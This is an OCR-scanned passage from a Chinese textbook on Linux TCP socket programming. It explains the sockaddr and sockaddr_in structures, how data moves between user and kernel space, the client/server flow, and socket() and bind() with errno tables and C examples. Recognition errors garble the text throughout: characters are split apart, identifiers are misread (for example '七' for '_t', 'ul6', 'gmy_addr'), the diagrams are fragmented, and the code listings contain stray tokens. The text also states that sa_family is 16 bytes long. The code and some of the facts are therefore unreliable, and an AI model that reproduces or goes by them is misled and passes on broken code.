口 介绍 如 何 对 信号 的 截取 ， 特 别 是 信号 SIGPIPE 和 信号 SIGINT。 


7.1 套 接 字 编 程 基础 知识 


在 进行 套 接 字 编 程 之 前 需要 对 基本 的 数据 结构 有 所 了 解 。 本 节 对 套 接 字 的 地 址 结构 定 
义 的 形式 、 如 何 使 用 套 接 字 的 地 址 结构 进行 详细 的 介绍 ， 并 且 对 Linux 操作 系统 中 用 户 空 
间 和 用 户 空间 之 间 的 交互 过 程 进行 简单 的 介绍 ， 使 用 户 对 网 络 程序 设计 的 方法 有 比较 深入 
的 了 解 。 
7.1.1 ， 套 接 字 地 址 结构 

套 接 字 编程 需要 指定 套 接 字 的 地 址 作为 参数 ， 不 同 的 协议 族 有 不 同 的 地 址 结构 定义 方 
式 。 这些 地 址 结构 通常 以 sockaddr 开头， 每 一 个 协议 族 有 一 个 唯一 的 后 级 ,例如 对 于 以 大 
网 ， 其 结构 名 称 为 sockaddr in。 

1. 通用 套 接 字 数据 结构 

通用 的 套 接 字 地 址 类 型 的 定义 如 下 ， 它 可 以 在 不 同 协议 族 之 间 进 行 强制 转换 。 


struct sockaddr { /* 套 接 字 地 址 结构 */ 
sa family t sa family /* 协 议 族 */ 
char sa data[14]; /* 协 议 族 数据 */ 


bh 
上 述 结构 中 协议 族 成 员 变 量 sa_family 的 类 型 为 sa_family_t, 其 实 这 个 类 型 是 unsigned 
short 类 型 ， 因 此 成 员 变量 sa_famliy 的 长 度 为 16 个 字 节 。 


typedef unsigned short sa family 七: 
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2. 实际 使 用 的 套 接 字数 据 结构 


在 网 络 程序 设计 中 所 使 用 的 函数 中 几乎 所 有 的 套 接 字 函数 都 用 这 个 结构 作为 参数 ， 例 
如 bind(O) 函 数 的 原型 为 : 


int bind(int sockfqd, /* 套 接 字 文 件 描述 符 */ 
const struct sockaddr *my addr, /* 套 接 字 地 址 结构 */ 
Socklen 七 addrlen); /* 套 接 字 地 址 结构 的 长 度 */ 


但 是 使 用 结构 struct sockaddr 不 方便 进行 设置 ， 在 以 太 网 中 ， 一 般 采 用 结构 struct 
sockaddr_in 进行 设置 ， 这 个 结构 的 定义 如 下 : 


struct sockaddr in { /* 以 太 网 套 接 字 地 址 结构 */ 
u8 sin len; /* 结 构 struct sockaddr_in 的 长 度 , 16*/ 
u8 sin family; /* 通 常 为 AF_INET*/ 
ul6 sin port; /*16 位 的 端口 号 , 网 络 字 节 序 */ 
struct in addr sin addr; /*IP 地 址 32 位 */ 
char sin zero[8]; /* 未 用 */ 


}; 
结构 struct sockaddr in 的 成 员 变 量 in_addr 用 于 表示 IP 地 址 ， 这 个 结构 的 定义 如 下 : 
struct in addr { /*IP 地 址 结构 */ 


u32 s_addr; /*32 位 IP 地 址 , 网 络 字 节 序 */ 
}; 


3. 结构 sockaddr 和 结构 sockaddr_in 的 关系 


结构 struct sockaddr 和 结构 struct sockaddr_in 是 一 个 同样 大 小 的 结构 , 其 对 应 关系 参见 
图 7.1。 
struct sockaddr_in struct sockaddr 
0 

of sinln TN sa foamily t 
1 | ug sin_family; sa_family; 
2 

ul6 sin_port; 
4 

struct in_addr 

sin_addr 
7 char 
sa_data[14]; 
char 
sin zero[8]; 

15| 15L | 


图 7.1 struct sockaddr 和 struct sockaddr in 的 对 应 关系 图 


= 
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struct sockaddr in 中 的 成 员 含义 如 下 所 述 。 
口 sin_ len: 无 符号 字符 类 型 ， 表 示 结 构 struct sockaddr in 的 长 度 ， 为 16。 
口 sin_family: 无 符号 字符 类 型 ， 通 常设 置 为 与 socket0 函 数 的 domain 一 致 ， 例 如 
AF_INET。 
口 sin_port: 无 符号 short 类 型 ， 表 示 端 口号 ， 网 络 字 节 序 。 
口 sin_addr: struct in addr 类 型 ， 其 成 员 s_addr 为 无 符号 32 位 数 ， 每 8 位 表示 IP 地 
址 的 一 个 段 ， 网 络 字 节 序 。 
口 sin_zero[8]: char 类 型 ， 保 留 。 
由 于 结构 struct sockaddr 和 结构 struct sockaddr in 的 大 小 是 完全 一 致 的 ,所 以 进行 地 址 
结构 设置 时 ,通常 的 方法 是 利用 结构 struct sockaddr in 进行 设置 , 然后 强制 转换 为 结构 struct 
sockaddr 类 型 。 因 为 这 两 个 结构 大 小 是 完全 一 致 的 ， 所 以 进行 这 样 的 转换 不 会 有 副作用 。 


7.1.2 用 户 层 和 内 核 层 交互 过 程 

套 接 字 参数 中 有 部 分 参数 是 需要 用 户 传 入 的 ， 这 些 参数 用 来 与 Linux 内 核 进行 通信 ， 
例如 指向 地 址 结构 的 指针 。 通 常 是 采用 内 存 复 制 的 方法 进行 。 例 如 bind0) 函 数 需 要 传 入 地 
址 结构 struct sockaddr *my_addr 和 my_addr 指 癌 参数 的 长 度 。 

1. 向 内 核 传 入 数据 的 交互 过 程 

向 内 核 传 入 数据 的 函数 有 send()、bind() 等 ， 从 内 核 得 到 数据 的 函数 有 accept()、recv() 
等 。 传 入 的 过 程 如 图 7.2 所 示 ，bind() 函 数 向 内 核 中 传 入 的 参数 有 套 接 字 地 址 结构 和 结构 的 
长 度 两 个 与 地 址 结构 有 关 的 参数 。 


长 度 
(int) 


套 搂 字 地 址 结构 
入 信和 用 户 空间 
| 内 核 空间 


网 络 协议 栈 


图 7.2 从 用 户 空间 向 内 核 空间 传递 参数 


参数 addlen 表 示 地 址 结构 的 长 度 ,参数 my_addr 是 指向 地 址 结构 的 指针 。 调 用 函数 bind0 
的 时 候 ， 地 址 结构 通过 内 存 复制 的 方式 将 其 中 的 内 容 复 制 到 内 核 ， 地 址 结构 的 长 度 通过 传 
值 的 方式 传 入 内 核 ， 内 核 按照 用 户 传 入 的 地 址 结构 长 度 来 复制 套 接 字 地 址 结构 的 内 容 。 


2. 内 核 传 出 数据 的 交互 过 程 


从 内 核 向 用 户 空 间 传 递 参 数 的 过 程 则 相反 ， 传 出 的 过 程 如 图 7.3 所 示 ， 通 过 地 址 结构 
的 长 度 和 套 接 字 地 址 结构 指针 来 进行 地 址 结构 参数 的 传 出 操作 。 通 常 是 两 个 参数 完成 传 出 
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操作 的 功能 , 一 个 是 表示 地 址 结构 长 度 的 参数 , 另 一 个 是 表示 套 接 字 地 址 结构 地 址 的 指针 。 


长 度 
(inb 
套 接 字 地 址 结构 
传 入 = 出 传 出 用 户 空间 
| 
] | 内 核 空间 
1 


网 络 协议 栈 


图 7.3 ”从 内 核 空间 向 用 户 空 间 传 递 参数 


传 出 过 程 与 传 入 过 程 中 的 参数 不 同 的 是 ， 表 示 地 址 结构 长 度 的 参数 在 传 入 过 程 中 是 传 
值 ， 而 在 传 出 过 程 中 是 通过 传 址 完成 的 。 内 核 按照 用 户 传 入 的 地 址 结构 长 度 进行 套 接 字 地 
址 结构 数据 的 复制 ， 将 内 核 中 的 地 址 结构 数据 复制 到 用 户 传 入 的 地 址 结构 指针 中 。 


7.2 ”TCP 网络 编程 流程 


TCP 网 络 编程 是 目前 比较 通用 的 方式 ， 例 如 HTTP 协议 、FTP 协议 等 很 多 广泛 应 用 的 
协议 均 基 于 TCP 协议 。TCP 编程 主要 为 C/S 模式 ， 即 客户 端 (C)、 服 务 器 (S) 模式 ， 这 
两 种 模式 之 间 的 程序 设计 流程 存在 很 大 的 差别 。 


7.2.1 TCP 网 络 编程 架构 


TCP 网 络 编程 有 两 种 模式 ， 一 种 是 服务 器 模式 ， 另 一 种 是 客户 端 模式 。 服 务 器 模式 创 
建 一 个 服务 程序 ， 等 待 客户 端 用 户 的 连接 ， 接 收 到 用 户 的 连接 请 求 后 ， 根 据 用户 的 请 求 进 
行 处 理 ， 客 户 端 模 式 则 根据 目的 服务 器 的 地 址 和 端口 进行 连接 ， 向 服务 器 发 送 请 求 并 对 服 
务 器 的 响应 进行 数据 处 理 。 


1. 服务 器 端的 程序 设计 模式 


如 图 7.4 所 示 为 TCP 连接 的 服务 器 模式 的 程序 设计 流程 。 流程 主要 分 为 套 接 字 初 始 化 
(socket(0) 函 数 ), 套 接 字 与 端口 的 绑 定 (bind() 函 数 ), 设置 服务 器 的 侦 听 连接 (listen0 函 数 )， 
接受 客户 端 连接 (accept0 函 数 )， 接 收 和 发 送 数据 (read() 函 数 、write0) 函 数 ) 并 进行 数据 
处 理 及 处 理 完 毕 的 套 接 字 关闭 〈close0) 函 数 )。 

口 套 接 字 初 始 化 过 程 中 ， 根 据 用 户 对 套 接 字 的 需求 来 确定 套 接 字 的 选项 。 这 个 过 程 
中 的 函数 为 socket()， 它 按照 用 户 定 义 的 网 络 类 型 、 协 议 类 型 和 具体 的 协议 标号 等 
参数 来 定义 。 系 统 根据 用 户 的 需求 生成 一 个 套 接 字 文 件 描述 符 供用 户 使 用 。 

口 套 接 字 与 端口 的 绑 定 过 程 中 ， 将 套 接 字 与 一 个 地 址 结构 进行 绑 定 。 绑 定之 后 ， 在 
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进行 网 络 程序 设计 的 时 候 ， 套 接 字 所 代表 的 IP 地 址 和 端口 地 址 ， 以 及 协议 类 型 等 
参数 按照 绑 定 值 进行 操作 。 

由 于 一 个 服务 器 需要 满足 多 个 客户 端的 连接 请 求 ， 而 服务 器 在 某 个 时 间 仅 能 处 理 
有 限 个 数 的 客户 端 连接 请 求 ， 所 以 服务 器 需要 设置 服务 端 排 队 队 列 的 长 度 。 服 务 
器 侦 听 连接 会 设置 这 个 参数 ， 限 制 客户 端 中 等 待 服务 器 处 理 连接 请 求 的 队列 长 度 。 
在 客户 端 发 送 连接 请 求 之 后 ， 服 务 器 需要 接收 客户 端的 连接 ， 然 后 才能 进行 其 他 
的 处 理 。 

在 服务 器 接收 客户 端 请 求 之 后 ， 可 以 从 套 接 字 文件 描述 符 中 读 取 数 据 或 者 向 文件 
描述 符 发 送 数据 。 接 收 数据 后 服务 器 按照 定义 的 规则 对 数据 进行 处 理 ， 并 将 结果 
发 送 给 客户 端 。 

当 服 务 器 处 理 完 数据 ， 要 结束 与 客户 端的 通信 过 程 的 时 候 ， 需 要 关闭 套 接 字 连接 。 


客户 端的 程序 设计 模式 


如 图 7.5 所 示 为 客户 端 模 式 , 主 要 分 为 套 接 字 初 始 化 (socket0 函 数 ), 连接 服务 器 (connect() 
函数 ), 读 写 网 络 数据 (read() 函 数 、write0 函 数 ) 并 进行 数据 处 理 和 最 后 的 套 接 字 关 闭 (close() 
函数 ) 过 程 。 


服务 器 端 模式 客户 端 模式 


bind() 
1 connect() 
listen() 
三 次 握手 连接 
了 De 
accept() wa 
1 写 入 数据 
read() S40 
read() 
1 读 取 数据 
write() 


| 
| 关闭 过 程 
olose0 Wd close() 
了 
结束 


图 7.4 TCP 的 服务 器 端 模式 ”图 7.5 TCP 的 客户 端 模式 
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客户 端 程序 设计 模式 流程 与 服务 器 端的 处 理 模式 流程 类 似 ， 二 者 的 不 同 之 处 是 客户 端 
在 套 接 字 初 始 化 之 后 可 以 不 进行 地 址 绑 定 ， 而 是 直接 连接 服务 器 端 。 

客户 端 连 接 服 务 器 的 处 理 过 程 中 ， 客 户 端 根据 用 户 设置 的 服务 器 地 址 、 端 口 等 参数 与 
特定 的 服务 器 程序 进行 通信 。 


3. 客户 端 与 服务 器 的 交互 过 程 


客户 端 与 服务 器 在 连接 、 读 写 数据 、 关 闭 过 程 中 有 交互 过 程 。 

口 客户 端的 连接 过 程 ， 对 服务 器 端 是 接收 过 程 ， 在 这 个 过 程 中 客户 端 与 服务 器 进行 
三 次 握手 ， 建 立 TCP 连接 。 建 立 TCP 连接 之 后 ， 客 户 端 与 服务 器 之 间 可 以 进行 数 
据 的 交互 。 

口 客户 端 与 服务 器 之 间 的 数据 交互 是 相对 的 过 程 ， 客 户 端的 读数 据 过 程 对 应 了 服务 
器 端的 写 数据 过 程 ， 客 户 端的 写 数据 过 程 对 应 服务 器 的 读数 据 过 程 。 

口 在 服务 器 和 客户 端 之 间 的 数据 交互 完毕 之 后 ， 关 闭 套 接 字 连接 。 

7.2.2 创建 网 络 插口 函数 socket() 

网 络 程序 设计 中 的 套 接 字 系统 调用 socket0 函 数 用 来 获得 文件 描述 符 。 

1. socket() 函 数 介绍 

socket() 函 数 的 原型 如 下 ， 这 个 函数 建立 一 个 协议 族 为 domain、 协 议 类 型 为 type、 协 议 

编号 为 protocol 的 套 接 字 文 件 描述 符 。 如 果 函 数 调用 成 功 ， 会 返回 一 个 表示 这 个 套 接 字 的 
文件 描述 符 ， 失 败 的 时 候 返 回 -1。 
#include <sys/types.h> 


#include <sys/socket.h> 
int socket (int domain, int type, int protocol); 


函数 socket() 的 参数 domain 用 于 设置 网 络 通信 的 域 , 函数 socket() 根 据 这 个 参数 选择 通 
信 协 议 的 族 。 通 信 协 议 族 在 文件 sys/socket.h 中 定义 ， 包含 表 7.1 所 示 的 值 ， 以 太 网 中 应 该 
使 用 PF_INET 这 个 域 。 在 程序 设计 的 时 候 会 发 现 有 的 代码 使 用 了 AF_INET 这 个 值 ， 在 头 
文件 中 AF_INET 和 PF_INET 的 值 是 一 致 的 。 
表 7.1 domain 的 值 及 含义 


名 称 含 义 
PF_UNIX, PF_LOCAL ITU-TX.25 /ISO-8208 协议 
PF_INET IPv4 Intemet 协议 PF AX25 Amateur radio AX.25 协议 
PF_INET6 IPv6 Intemet 协议 PF_ATMPVC 原始 ATM PVC 访问 
PF_IPX IPX - Novell 协议 PF APPLETALK | Appletalk 
PF_NETLINK 内 核 用户 界 面 设备 PF PACKET 底层 包 访问 


函数 socket() 的 参数 type 用 于 设置 套 接 字 通 信 的 类 型 ， 如 表 7.2 所 示 为 type 格式 定 
义 值 及 含义 。 主 要 有 SOCK_STREAM ( 流 式 套 接 字 )、SOCK DGRAM (数据 包 套 接 
字 ) 等 。 
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表 7.2 type 的 值 及 含义 


名 称 含义 
SOCK _ STREAM TCP 连接 ， 提 供 序列 化 的 、 可 靠 的、 双向 连接 的 字 节 流 。 支 持 带 外 数据 传输 
SOCK DGRAM 支持 UDP 连接 (无 连接 状态 的 消息 ) 


序列 化 包 ， 提 供 一 个 序列 化 的 、 可 靠 的 、 双 向 的 基于 连接 的 数据 传输 通道 ， 数 


SOCK_SEQPACKET | 据 长 度 定 长 。 每 次 调用 读 系 统 调用 时 数据 需要 将 全 部 数据 读 出 


SOCK RAW RAW 类 型 ， 提 供 原始 网 络 协议 访问 
SOCK RDM 提供 可 靠 的 数据 报 文 ， 不 过 数据 可 能 会 有 乱 序 


SOCK PACKET 这 是 一 个 专用 类 型 ， 不 能 在 通用 程序 中 使 用 


并 不 是 所 有 的 协议 族 都 实现 了 这 些 协 议 类 型 ， 例 如 ，AF_INET 协议 族 就 没有 实现 
SOCK_SEQPACKET 协议 类 型 。 
函数 socket0 的 第 3 个 参数 protocol 用 于 指定 某 个 协议 的 特定 类 型 ， 即 type 类 型 中 的 
某 个 类 型 。 通 常 某 个 协议 中 只 有 一 种 特定 类 型 ， 这 样 protocol 参数 仅 能 设置 为 0; 但 是 有 
些 协议 有 多 种 特定 的 类 型 ， 就 需要 设置 这 个 参数 来 选择 特定 的 类 型 。 
口 类 型 为 SOCK_STREAM 的 套 接 字 表示 一 个 双向 的 字 节 流 , 与 管道 类 似 。 流 式 的 套 接 
字 在 进行 数据 收发 之 前 必须 已 经 连接 ， 连 接 使 用 connect() 函 数 进行 。 一 旦 连接 ， 可 
以 使 用 read() 或 者 write0) 函 数 进行 数据 的 传输 。 流 式 通 信 方 式 保证 数据 不 会 丢失 或 者 
重复 接收 ， 当 数据 在 一 段 时 间 内 仍然 没有 接收 完毕 ， 可 以 认为 这 个 连接 已 经 死 掉 。 
口 SOCK_ DGRAM 和 SOCK RAW 这 两 种 套 接 字 可 以 使 用 函数 sendto() 来 发 送 数据 ， 
使 用 recvfrom() 函 数 接收 数据 ，recvfrom() 接 收 来 自 指定 IP 地 址 的 发 送 方 的 数据 。 
口 SOCK_PACKET 是 一 种 专用 的 数据 包 ， 它 直接 从 设备 驱动 接收 数据 。 
函数 socket0 并 不 总 是 执行 成 功 ， 有 可 能 会 出 现 错误 , 错误 的 产生 有 多 种 原因 ,可 以 通 
过 errno 获得 ， 具 体 值 和 含义 在 表 7.3 中 列 出。 通常 情况 下 造成 函数 socket() 失 败 的 原因 是 
输入 的 参数 错误 造成 的 ， 例 如 某 个 协议 不 存在 等 ， 这 时 需要 详细 检查 函数 的 输入 参数 。 由 
于 函数 的 调用 不 一 定 成 功 ， 在 进行 程序 设计 的 时 候 ， 一 定 要 检查 返回 值 。 


表 7.3 errno 的 值 及 含义 


值 含义 
EACCES 没有 权限 建立 指定 domain 的 type 的 socket 
EAFNOSUPPORT 不 支持 所 给 的 地 址 类 型 
EINVAL 不 支持 此 协议 或 者 协议 不 可 用 
EMFILE 进程 文件 表 溢出 
ENFILE 已 经 达到 系统 允许 打开 的 文件 数量 ， 打 开 文件 过 多 
ENOBUFS/ENOMEM 内 存 不 足 
EPROTONOSUPPORT 指定 的 协议 type 在 domain 中 不 存在 
其 他 


使 用 socketO 函 数 的 时 候 需 要 设置 上 述 3 个 参数 ,如 将 socket() 函 数 的 第 1 个 参数 domain 
设置 为 AF INET， 第 2 个 参数 设置 为 SOCK_ STREAM， 第 3 个 参数 设置 为 0， 建立 一 个 
流 式 套 接 字 。 


了 


第 2 篇 Linux 用 户 层 网 络 编程 


int sock = socket (AF_INET, SOCK STREAM,0); 


2. 应 用 层 函 数 socket() 和 内 核 函 数 之 间 的 关系 


户 设置 套 接 字 的 参数 后 , 函数 要 能 够 起 作用 , 需要 与 内 核 空间 的 相关 系统 调用 交互 。 
应 用 层 的 socket() 函 数 是 和 内 核 层 的 系统 调用 相对 应 的 ， 如 图 7.6 所 示 。 


Int sock = socket(AF_INET, SOCK_STREAM, 0); 


2 
2 内 核 层 


int sock = sys_socket(AF_INET, 
SOCK_STREAM, 0); 


struct socket *sock; 
retval = Sock_create(AF_ INET, SOCK_STREAM, 


0, &sock); 
int retval; 


retval = sock_map_fd(sock); 


图 7.6 应 用 层 socket 和 内 核 层 的 系统 调用 sys_socket 关系 


图 中 用 户 调用 函数 sock=socket(AF_INET,SOCK_STREAM,0)， 这 个 函数 会 调用 系统 调 
用 函数 sys_socket(AF_INET, SOCK_STREAM.,0) (在 文件 net/socket.c 中 )。 系 统 调用 函数 
sys_socket() 分 为 两 部 分 ， 一 部 分 生成 内 核 socket 结构 (注意 与 应 用 层 的 socket() 函 数 是 不 
同 的 )， 另 一 部 分 与 文件 描述 符 绑 定 ， 将 绑 定 的 文件 描述 符 值 传 给 应 用 层 。 内 核 sock 结构 
如 下 《在 文件 linux/net.h 中 ): 
struct socket { 
socket_ state state; /*socket 状态 (例如 SS_CONNECTED 等 )*/ 
unsigned long flags; /*socket 标志 (SOCK_ASYNC_NOSPACE 等 )*/ 
const struct proto ops *ops;  ”/* 协 议 特定 的 socket 操作 */ 
struct fasync struct  *fasync list;  /* 异 步 唤醒 列表 */ 


struct file *file; /* 文 件 指针 */ 

struct sock *#Sk; /* 内 部 网 络 协议 结构 */ 

wait queue head 七 wait; /* 多 用 户 时 的 等 待 队列 */ 

short type; /*socket 类 型 (SOCK_STREAM 等 )*/ 


De 


内 核 函 数 sock_create() 根 据 用 户 的 domain 指定 的 协议 族 , 创建 一 个 内 核 socket 结构 绑 
定 到 当前 的 进程 上 ， 其 中 的 type 与 用 户 空 间 用 户 的 设置 值 是 相同 的 。 
sock_map_fd() 函 数 将 socket 结构 与 文件 描述 符 列 表 中 的 某 个 文件 描述 符 绑 定 ， 之 后 的 


有 
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操作 可 以 查找 文件 描述 符 列表 来 对 应 内 核 socket 结构 。 
7.2.3” 绑 定 一 个 地 址 端口 对 bind() 函 数 


在 建立 套 接 字 文 件 描述 符 成 功 后， 需要 对 套 接 字 进行 地 址 和 端口 的 绑 定 ， 才 能 进行 数 
据 的 接收 和 发 送 操 作 。 


1. bind() 函 数 介 绍 


bind0 函 数 将 长 度 为 addlen 的 struct sockadd 类 型 的 参数 my_addr 与 sockfd 绑 定 在 一 起 ， 
将 sockfd 绑 定 到 某 个 端口 上 ， 如 果 使 用 connectO) 函 数 则 没有 绑 定 的 必要 。 绑 定 的 函数 原型 


如 下 : 


#include <sys/types.h> 
#include <sys/socket.h> 
int bind(int sockfd, const struct sockaddr *my addr, socklen t addrlen); 


bindO0 函 数 有 3 个 参数 。 第 1 个 参数 sockfd 是 用 socket() 函 数 创建 的 文件 描述 符 。 


第 2 个 参数 my_addr 是 指 问 


-个 结构 为 sockaddr 参数 的 指针 , sockaddr 中 包含 了 地 址 、 


端口 和 IP 地 址 的 信息 。 在 进行 地 址 绑 定 的 时 候 ， 需 要 先 将 地 址 结构 中 的 卫 地 址 、 端 口 、 
类 型 等 结构 struct sockaddr 中 的 域 进行 设置 后 才能 进行 绑 定 ， 这 样 进行 绑 定 后 才能 将 套 接 


字 文 件 描述 符 与 地 址 等 结合 在 
第 3 个 参数 addrlen 是 my_addr 结构 的 长 度 ， 
sizeof(struct sockaddr) 来 设置 addlen 是 一 个 良好 的 习惯 ， 


- 


可 以 设置 成 sizeofstruct sockaddr)。 使 用 
虽然 一 般 情况 下 使 用 AF_INET 来 


设置 套 接 字 的 类 型 和 其 对 应 的 结构 ， 但 是 不 同类 型 的 套 接 字 有 不 同 的 地 址 描述 结构 ， 如 果 
对 地 址 长 度 进行 了 强制 的 指定 ， 可 能 会 造成 不 可 预料 的 结果 。 
bind0 函 数 的 返回 值 为 0 时 表示 绑 定 成 功 ，-1 表示 绑 定 失败 ，errno 的 错误 值 如 表 7.4 


所 示 。 
表 7.4 bind 的 errno 值 及 含义 
值 含义 备 注 
EADDRINUSE 给 定 地 址 已 经 使 用 
EBADF sockfd 不 合法 
EINVAL sockfd 已 经 绑 定 到 其 他 地 址 
ENOTSOCK sockfd 是 一 个 文件 描述 符 ， 不 是 socket 描述 符 
EACCES 地 址 被 保护 ， 用 户 的 权限 不 足 
EADDRNOTAVAIL | 接口 不 存在 或 者 绑 定 地 址 不 是 本 地 UNIX 协议 族 ，AF_UNIX 
EFAULT my_addr 指针 超出 用 户 空间 UNIX 协议 族 ，AF_UNIX 
EINVAL 地 址 长 度 错误 ， 或 者 socket 不 是 AF_UNIX 族 UNIX 协议 族 ，AF_UNIX 
ELOOP 解析 my_addr 是 符号 链接 过 多 UNIX 协议 族 ，AF_UNIX 
ENAMETOOLONG | my addr 过 长 UNIX 协议 族 ，AF_UNIX 
ENOENT 文件 不 存在 UNIX 协议 族 ，AF_UNIX 
ENOMEM 内 存 内 核 不 足 UNIX 协议 族 ，AF_UNIX 
ENOTDIR 不 是 目录 UNIX 协议 族 ，AF_UNIX 
EROFS socket 节点 应 该 在 只 读 文件 系统 上 UNIX 协议 族 ，AF_UNIX 


“Ss 
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下 面 的 代码 初始 化 一 个 AF_UNIX 族 中 的 SOCK_STREAM 类 型 的 套 接 字 。 先 使 用 结 
构 struct sockaddr_ un 初始 化 my_addr, 然后 进行 绑 定 , 结构 struct sockaddr_un 的 定义 如 下 : 
struct sockaddr un { 
sa family t sun family; /* 协 议 族 , 应 该 设置 为 AF_UNIX*/ 
char sun path[UNIX PATH MAX]; /* 路 径 名 , UNIX_PATH_MAX 的 值 为 108*/ 
}; 


2. bind() 函 数 的 例子 
下 面 是 使 用 bind0) 函 数 进行 程序 设计 的 一 个 实例 代码 ， 先 建立 一 个 UNIX 族 的 流 类 型 
套 接 字 ， 然 后 将 套 接 字 地 址 和 套 接 字 文 件 描述 符 进 行 绑 定 。 


#define MY SOCK PATH "/somepath" 
01 int main(int argc, char *argv[]) 


1p | 
03 int sfd; 
04 struct sockaddr un addr; /*AF_UNIX 对 应 的 结构 */ 
05 sfd = socket(AF UNIX, SOCK _ STREAM, 0); 
/* 初 始 化 一 个 AF_UNIX 族 的 流 类 型 socket*/ 
06 if (sfd == -1) { /* 检 查 是 否 正 常 初始 化 socket*/ 
07 perror ("socket"); 
08 exit (EXIT FAILURE); 
09 } 
10 memset (&addr, 0, sizeof (struct sockaddr un)); /* 将 变量 addr 置 0*/ 
1 addr.sun family = AF_UNIX; /* 协 议 族 为 AF_UNIX*/ 
12 strncpy (addr.sun path, MY SOCK_ PATH, /* 复 制 路 径 到 地 址 结构 */ 
13 sizeof (addr.sun Path) - 1); 
14 if (bind(sfd, (struct sockaddr *) &addr， /* 绑 定 */ 
二 5 sizeof(struct sockaddr un)) == -1) { /* 判 断 是 否 绑 定 成 功 *#/ 
16 perror ("bind"); 
hy exit (EXIT FAILURE); 
18 } 外 
19 a /* 数 据 接 收发 送 及 处 理 过 程 */ 
20 close (sfd); /* 关 闭 套 接 字 文件 描述 符 */ 
6 | 辐 汪 | 
口 第 05 行将 协议 族 参数 设置 为 AF_ UNIX 建立 UNIX 族 套 接 字 ， 使 用 函数 socket() 
进行 建立 。 
口 第 10 行 初始 化 地 址 结构 ， 将 UNIX 地 址 结构 设置 为 0， 这 是 进行 程序 设计 时 常用 
的 初始 化 方法 。 


口 第 11 行将 地 址 结构 的 参数 sun_famliy 设置 为 AF_UNIX。 

口 第 12 行 复制 地 址 结构 的 路 径 。 

口 第 14 行将 套 接 字 文 件 描述 符 与 UNIX 地 址 结构 绑 定 在 一 起 。 

口 第 15 行 判 断 是 否 绑 定 成 功 。 

口 第 19 行进 行 数据 的 接收 、 发 送 和 数据 的 处 理 过 程 。 

全 注意 : Linux 的 GCC 编译 器 有 一 个 特点 ， 一 个 结构 的 最 后 一 个 成 员 为 数组 时 ， 这 个 结构 

可 以 通过 最 后 一 个 成 员 进 行 扩展 ， 可 以 在 程序 运行 时 第 一 次 调用 此 变量 的 时 候 动 
态 生 成 结构 的 大 小 。 例 如 上 面 的 代码 ， 并 不 会 因为 struct sockaddr un 比 struct 


。190 。 


第 7 章 TCP 网 络 编程 基础 


sockaddr 大 而 溢出 。 


另 一 个 例子 是 使 用 结构 struct sockaddr in 绑 定 一 个 AF_ INET 族 的 流 协议 ， 先 将 结构 
struct sockaddr in 的 sin_famliy 设置 为 AF_ INET， 然 后 设置 端口 ， 接 着 设置 一 个 卫 地 址 ， 
最 后 进行 绑 定 。 实 例 代码 如 下 : 


#define MYPORT 3490 /* 端 口 地 址 */ 

int 

main(int argc char *argv[]) 

{ 
int sockfd; /* 套 接 字 文件 描述 符 变 量 */ 
struct sockaddr in my addr; /* 以 太 网 套 接 字 地 址 结构 */ 


sockfd = socket (AF INET, SOCK STREAM, 0); /* 初 始 化 socket*/ 

if (sockfd == -1) { /* 检 查 是 否 正常 初始 化 socket*/ 
perror ("socket"); 
exit (EXIT FAILURE); 

} 

my_addr.sin family = AF_INET; /* 地 址 结构 的 协议 族 */ 

my_addr.sin port = htons (MYPORT) ;  /* 地 址 结构 的 端口 地 址 , 网 络 字 节 序 */ 

my_addr.sin addr.s addr = inet addr("192.168.1.150"); 

/*IP, 将 字符 串 的 IP 地 址 转化 为 网 络 字 节 序 */ 


bzero(& (my addr.sin zero), 8); /* 将 my_addr.sin_zero 置 为 0*/ 
if (bind(sockfd, (struct sockaddr *) gmy_addr, 
sizeof(struct sockaddr)) == -1) { /+ 判断 是 否 绑 定 成 功 */ 


perror ("bind"); 

exit (EXIT FAILURE); 
} 
六 /* 接 收 和 发 送 数据 , 进行 数据 处 理 */ 
close (sockfd) ; /* 关 闭 套 接 字 文 件 描述 符 */ 


第 01 行 定义 地 址 结构 中 需要 绑 定 地 址 的 端口 值 。 

第 05 行 和 第 06 行 初始 化 套 接 字 文 件 描述 符 和 以 太 网 地 址 结构 的 变量 。 

第 08 行 建立 一 个 AF_INET 类 型 的 流 式 套 接 字 。 

第 09 一 12 行 是 套 接 字 初始 化 失败 时 候 的 处 理 措施 。 

第 13 行 设置 地 址 结构 的 协议 族 为 AF_INET。 

第 14 行 设置 地 址 结构 的 端口 地 址 为 MYPORT， 由 于 MYPORT 为 主机 字 节 序 ， 使 
用 函数 htons0 进 行 字 节 序 转换 。 

第 15 行 设 置地 址 结构 的 卫 地址 , 使 用 函数 inet_addr0) 将 字符 串 192.168.1.150 转换 
为 二 进 制 网 络 字 节 序 的 全 地 址 值 。 

第 16 行将 地 址 结构 的 sin_zero 域 设置 为 0。 

第 17 行将 地 址 结构 与 套 接 字 文件 描述 符 进行 绑 定 。 

第 22 行 接收 数据 、 发 送 数 据 和 进行 数据 处 理 的 过 程 。 

第 23 行 在 数据 处 理 过 程 结束 后 ， 关 闭 套 接 字 。 


3. 应 用 层 bind() 函 数 和 内 核 函数 之 间 的 关系 


函数 bind() 是 应 用 层 函 数 ， 要 使 函数 生效 ， 就 要 将 相关 的 参数 传递 给 内 核 并 进行 处 理 


o 


“gle 


应 用 层 的 bind() 函 数 与 内 核 层 之 间 的 函数 过 程 如 图 7.7 所 示 ， 图 中 是 一 个 AF_INET 族 函 数 
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进行 绑 定 的 调用 过 程 。 
[so 要 1 口 和 IP 地 
址 绑 到 sockfd 上 
bind(sockfd, (struct sockaddr * )&my 
_addr, sizeoflstruct sockaddr)); 应 用 层 
| bind0 函 数 对 应 的 系统 调用 函 
内 核 层 数 sys_bind() 


long sys_bind(sockfd, (struct 
sockaddr*)&my_addr, 
Sizeoflstruct sockaddr)) 


| 函数 sockfd_lookup_light0 获 


struct socket *sock;int err, 
fput_needed; sock = sockfd lookup light 
(sockfd, &err, &fput_needed); 


得 文件 描述 符 sockfd 对 应 的 
pd | 内 核 结构 struct sock 的 指针 


函数 Move_addr_to_kernel() 将 应 
用 层 的 地 址 移 到 内 核 屋 ， 放 到 
address 中 


char address[IMAX_SOCK_ADDR]; 
move_addr to_kernel(umyaddr, addrlen, 
address); 


AF_INET 族 


int inet_bind(struct socket *sock, 


err = sock->ops->bind(sock, 
(struct ockaddr *) address, 


struct sockaddr *uaddr, int 
addr len) 


addrlen); 
调用 应 用 层 函 数 bind(0) 对 应 协议 族 AF_INET 的 bind() 函 
协议 族 的 bindO) 函 数 实现 数 实现 为 inet_bind() 


